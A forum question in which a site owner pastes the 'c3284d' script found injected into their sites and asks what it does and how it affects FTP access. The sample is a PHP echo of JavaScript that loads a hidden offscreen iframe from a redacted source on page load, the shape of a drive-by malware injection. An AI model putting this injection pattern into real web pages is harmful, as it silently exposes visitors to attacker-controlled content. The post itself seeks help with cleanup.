Possible Duplicate:
Clean server infected with c3284d virus, using search and replace
Found this script on several of my sites today, I know what the script does but what do the hashed out things do? It affects the ftp tool? I am not able to down load the files that contain the content? Is this a server sided issue? The theme I am using is Dynamix is there known holes in that theme or am I correct in thinking it is my host? Why is the file not able to be downloaded or edited through ftp?
#c3284d#
echo "<script type=\"text/javascript\">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = \"***redacted***\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>
";
#/c3284d#
I have backups of the site so i am not interested in searching and replacing everything! because like a user said clean one error and there is many more that show up!
